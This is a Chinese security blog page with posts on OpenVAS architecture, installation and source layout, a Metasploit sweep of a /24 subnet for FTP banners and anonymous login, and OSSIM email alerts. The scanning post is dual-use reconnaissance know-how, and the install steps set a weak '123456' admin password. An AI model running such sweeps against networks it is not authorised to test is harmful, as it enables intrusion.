OpenVAS 是一款开放式的漏洞评估工具，主要用来检测目标网络或主机的安全性。用户通过浏览器或者专用客户端程序来下达扫描任务，服务器端负载授权，执行扫描操作并提供扫描结果。它既提供大量的免费扫描插件（NVT，Network Vulnerability Tests），也提供商业化的增强扫描插件（GSF，Greenbone Security Feed）

具体结构

用户层接口

Openvas-cli

命令行接口: 通过OMP (OpenVAS Management Protocol) 从命令行访问 openvas 服务层的程序

1	如果要进行二次开发的话，可通过该命令行接口调用一些东西。

Greenbone Security Assistabt

访问 web 端接口(gsad) 访问 opebvas 服务层的 web 接口，默认监听地址为 127.0.0.1，端口为 9392

服务层组件

openvas-manager

管理器：与接口通信，分配扫描任务, 数据库与用户(用户组)，并根据扫描结果生成评估报告，默认端口为 9390

OpenVAS管理协议(OMP)
SQL数据库(sqlite)配置和扫描结果
支持SSL
高并发扫描任务
管理和标记扫描结果
预扫描
用户管理

OpenVAS Scanner

扫描器：调用各种漏洞测试插件，执行分配的扫描操作，默认端口为 9391

同时许多目标主机扫描
OpenVAS传输协议(OTP)
支持SSL
支持 WMI（Windows Management Instrumentation,Windows 管理规范）是一项核心的 Windows 管理技术；用户可以使用 WMI 管理本地和远程计算机。
等等

部分模块通信方式

通信方式

OpenVAS安装步骤

环境 kali 2.0
源列表使用官方源

1
2
3

deb http://http.kali.org/kali kali-rolling main contrib non-free
# For source package access, uncomment the following line
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free

更新系统

1
2
3

apt-get update
apt-get upgrade
apt-get dis-upgrade

安装openvas

1 2	apt-get install openvas openvas-setup

为了确认 OpenVAS 是否安装完成，可以使用 openvas-check-setup 对该服务进行检查,最终结果显示OK则表示安装成功。

1	openvas-check-setup

修改用户密码

1	openvasmd --user=admin --new-password=123456

启动服务

1 2	➜ ~ openvas-start Starting OpenVas Services

检查相应端口是否启用

➜  ~  netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:9390          0.0.0.0:*               LISTEN      1893/openvasmd      
tcp        0      0 127.0.0.1:9391          0.0.0.0:*               LISTEN      1763/openvassd: Wai
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN      1796/gsad           
tcp        0      0 127.0.0.1:9392          0.0.0.0:*               LISTEN      1723/gsad

创建相应环境

openvas-setup && openvas-scapdata-sync && openvas-certdata-sync && openvas-check-setup && openvas-stop
openvasmd --create-user=admin --role=Admin
openvasmd --user=admin --new-password=NEWPASSWORD
openvas-start

出现上面的结果就可以打开https://127.0.0.1:9392,访问了。记住是HTTPS

OpenVAS源码结构

版本：OpenVAS-8
主要代码

由C语言编写

Libraries 8.0.7
Scanner 5.0.5 	
Manager 6.0.8 	
Greenbone Security Assistant (GSA) 6.0.10

扩展代码

由C语言编写

1 2	Commandline Interface (CLI) 1.4.4 openvas-smb 1.0.1

OSP

(OpenVAS Scanner Protocol) OpenVAS扫描协议
由Python编写

OSPd 1.0.2
OSPd-Ancor 1.0.0
OSPd-debsecan 1.0.0
OSPd-ovaldi 1.0.0
OSPd-PaloAlto 1.0b1
OSPd-w3af 1.0.0
OSPd-Acunetix 1.0b1
OSPd-ikescan 1.0b1
OSPd-ikeprobe 1.0b1
OSPd-ssh-keyscan 1.0b1
OSPd-netstat 1.0b1

OpenVAS源码结构

CLI

通过命令行操作OpenVAS services

使用方法

1	可通过 omp --help查看该命令帮助信息

工作方法

1	通过OpenVAS管理协议与openvas-manager进行通信

内置方法

1
2
3

通过文件内容进行链接--connection_from_file
连接、断开 manager
输出 任务、配置、标签等信息等

Greenbone Security Assistant

Greenbone安全助理提供了openvas的一个web管理界面，也支持一些命令行操作

使用方法

1	gsad --help

工作方法

1	通过OpenVAS管理协议与openvas-manager进行通信

内置方法

1	用户相关操作，如添加、查找、设置时区、密码等、

代码文件

├── gsad_base.c
├── gsad_base.h
├── gsad.c
├── gsad_log_conf.cmake_in
├── gsad_omp.c
├── gsad_omp.h
├── tracef.h
├── validator.c
├── validator.h
├── xslt_i18n.c
└── xslt_i18n.h

openvas-manager

代码文件

├── logf.h
├── lsc_crypt.h
├── manage_acl.h
├── manage_config_host_discovery.c
├── manage_config_system_discovery.c
├── manage.h
├── manage_migrators.c
├── manage_pg.c
├── manage_pg_server.c
├── manage_ranges_iana_tcp_2012.c
├── manage_ranges_iana_tcp_udp_2012.c
├── manage_sql.h
├── manage_sqlite3.c
├── manage_utils.c
├── openvasmd.c
├── otp.c
├── ovas-mngr-comm.c
├── ovas-mngr-comm.h
├── scanner.c
├── sql.c
├── tracef.h
└── types.h

OpenVAS Scanner

代码文件

.
├── attack.c    启动插件和管理多线程
├── attack.h
├── comm.c   使用NTP协议与Manager进行通信
├── comm.h
├── hosts.c   为测试主机创建新进程
├── hosts.h
├── log.c    日志管理
├── log.h
├── nasl_plugins.c    启动NASL 插件
├── ntp.c     处理OTP协议
├── ntp.h
├── openvassd.c    运行OpenVAS-scanner
├── otp.c      实现OpenVAS传输协议
├── otp.h
├── pluginlaunch.c   管理插件的启动进程
├── pluginlaunch.h
├── pluginload.c     从磁盘加载插件到内存中
├── pluginload.h
├── pluginscheduler.c   告诉openvassd下一步应该执行哪个插件
├── pluginscheduler.h
├── plugs_req.c    对特定插件进行检查
├── plugs_req.h
├── processes.c     创建新线程
├── processes.h
├── sighand.c     提供信号处理功能
├── sighand.h
├── utils.c     一些功能,主要进行文件的转换
└── utils.h

openvas-libraries

base

代码文件

├── array.c    数组工具
├── array.h
├── credentials.c   证书对和三元组
├── credentials.h
├── cvss.c     CVSS功能函数
├── cvss.h
├── drop_privileges.c  降权
├── drop_privileges.h
├── gpgme_util.c
├── gpgme_util.h
├── nvti.c     通过API实现处理NVT信息数据集
├── nvticache.c通过API实现处理NVT信息缓存
├── nvticache.h
├── nvti.h
├── openvas_compress.c    数据压缩
├── openvas_compress.h
├── openvas_file.c
├── openvas_file.h
├── openvas_hosts.c
├── openvas_hosts.h
├── openvas_networking.c
├── openvas_networking.h
├── openvas_string.c
├── openvas_string.h
├── osp.c    API来处理OSP的实现
├── osp.h
├── pidfile.c
├── pidfile.h
├── pwpolicy.c    密码检查策略
├── pwpolicy.h
├── settings.c
├── settings.h
└── test-hosts.c

nasl

NASL(Nessus Attack Scripting Language) 是一种为Nessus安全扫描器所设计的脚本语言。它的目的在于使每个人都可以在几分钟内对给定的安全漏洞写出测试代码，并允许人们分享他们的测试代码而不用担心自己使用的是什么操作系统。

├── arc4.c
├── byteorder.h
├── capture_packet.c
├── capture_packet.h
├── charcnv.c
├── charset.h
├── exec.c
├── exec.h
├── genrand.c
├── hmacmd5.c
├── hmacmd5.h
├── iconv.c
├── iconv.h
├── lint.c
├── md4.c
├── md4.h
├── md5.c
├── md5.h
├── nasl_builtin_find_service.c
├── nasl_builtin_nmap.c
├── nasl_builtin_openvas_tcp_scanner.c
├── nasl_builtin_plugins.h
├── nasl_builtin_synscan.c
├── nasl.c
├── nasl_cert.c
├── nasl_cert.h
├── nasl_cmd_exec.c
├── nasl_cmd_exec.h
├── nasl_crypto2.c
├── nasl_crypto2.h
├── nasl_crypto.c
├── nasl_crypto.h
├── nasl_debug.c
├── nasl_debug.h
├── nasl_func.c
├── nasl_func.h
├── nasl_global_ctxt.h
├── nasl_grammar.y
├── nasl.h
├── nasl_host.c
├── nasl_host.h
├── nasl_http.c
├── nasl_http.h
├── nasl_init.c
├── nasl_init.h
├── nasl_isotime.c
├── nasl_isotime.h
├── nasl_lex_ctxt.c
├── nasl_lex_ctxt.h
├── nasl-lint.c
├── nasl_misc_funcs.c
├── nasl_misc_funcs.h
├── nasl_packet_forgery.c
├── nasl_packet_forgery.h
├── nasl_packet_forgery_v6.c
├── nasl_packet_forgery_v6.h
├── nasl_raw.h
├── nasl_scanner_glue.c
├── nasl_scanner_glue.h
├── nasl_signature.c
├── nasl_signature.h
├── nasl_smb.c
├── nasl_smb.h
├── nasl_snmp.c
├── nasl_snmp.h
├── nasl_socket.c
├── nasl_socket.h
├── nasl_ssh.c
├── nasl_ssh.h
├── nasl_text_utils.c
├── nasl_text_utils.h
├── nasl_tree.c
├── nasl_tree.h
├── nasl_var.c
├── nasl_var.h
├── nasl_wmi.c
├── nasl_wmi.h
├── ntlmssp.c
├── ntlmssp.h
├── openvas_smb_interface.h
├── openvas_wmi_interface.h
├── proto.h
├── smb_crypt2.c
├── smb_crypt.c
├── smb_crypt.h
├── smb.h
├── smb_interface_stub.c
├── smb_signing.c
├── smb_signing.h
├── strutils.c
├── strutils.h
├── time.c
└── wmi_interface_stub.c

openvas相关文件

更新插件

1	openvas-nvt-sync

插件目录

1	/var/lib/openvas/plugins

同步数据库

1	openvas-scapdata-sync

数据库目录

1	/var/lib/openvas/scap-data

OSPD学习

主要代码文件

.
├── __init__.py
├── misc.py
├── ospd.py
├── ospd_ssh.py
└── win_socket.py

misc.py
可以设置Scan相关信息，如新建Scan、设置[查看]

add_result
results_iterator
ids_iterator
create_scan
options
progress

ospd.py
也可以获取和设置Scan的一些参数

展开全文 >>

使用msf进行FTP扫描

2016-08-02

开启PostgreSQL

Kali 2.0

1	service postgresql start

查看PostgreSQL是否启动成功

默认端口为5432

➜  ~  netstat -antp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      2377/postgres       
tcp        0      0 127.0.0.1:6379          0.0.0.0:*               LISTEN      737/redis-server 12
tcp6       0      0 ::1:5432                :::*                    LISTEN      2377/postgres

initialize the msf database

1	msfdb init

Launch msfconsole in Kali

1	msfconsole

1
2
3

msf > db_status
[*] postgresql connected to msf
msf >

FTP 扫描

1	msf > use scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(ftp_version) > set THREADS 255
THREADS => 255
msf auxiliary(ftp_version) > run
[*] 192.168.1.55:21 FTP Banner: '220 Slyar FTPserver!\x0d\x0a'
[*] 192.168.1.88:21 FTP Banner: '220 \xbb\xb6\xd3\xad\xb7\xc3\xce\xca Slyar FTPserver!\x0d\x0a'
[*] Scanned  32 of 256 hosts (12% complete)
[*] Scanned 244 of 256 hosts (95% complete)
[*] Scanned 250 of 256 hosts (97% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 254 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

查看是否可用匿名登陆

msf auxiliary(ftp_version) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf auxiliary(anonymous) > set THREADS 50
THREADS => 50
msf auxiliary(anonymous) > run

[+] 192.168.1.55:21 - Anonymous READ (220 Slyar FTPserver!)
[*] Scanned  38 of 256 hosts (14% complete)
[*] Scanned  71 of 256 hosts (27% complete)
[*] Scanned  82 of 256 hosts (32% complete)
[*] Scanned 111 of 256 hosts (43% complete)
[*] Scanned 160 of 256 hosts (62% complete)
[*] Scanned 167 of 256 hosts (65% complete)
[*] Scanned 188 of 256 hosts (73% complete)
[*] Scanned 247 of 256 hosts (96% complete)
[*] Scanned 255 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >

展开全文 >>

OSSIM-新建邮件提醒

2016-07-27

修改OSSIM ossim_setup.conf文件

相关操作见 https://www.alienvault.com/forums/discussion/925/ossim-4-email-notification

1 - Edit the file /etc/ossim/ossim_setup.conf the editor they like.
2 - Change the following parameters:
email_notify=user@company.com
mailserver_relay=xxx.xxx.xxx.xxx
3 - Save the changes and exit the editor.
4 - run ossim-reconfig
5 - Send a test mail:
echo "text" | mail -s "Subject" user@domain.com
6 - Check the mail delivery system is functioning properly:
tail -f /var/log/mail.log

临时申请了个邮箱把信息填写如下：

OSSIM Web端相关设置

创建发生邮件的操作

相关设置见 https://www.alienvault.com/documentation/usm-v5/policy-management/create-action-send-email.htm

1
2
3

From Configuration > Threat Intelligence, click the ACTIONS tab.
Click New.

设置好名称、描述、发件邮箱、收件人、邮件主题和邮件内容，TYPE必须选择为Send an email message
如下图所示

创建触发发送邮件的条件
操作步骤 https://www.alienvault.com/documentation/usm-v5/policy-management/create-ext-pol-trigger-email.htm

效果图

展开全文 >>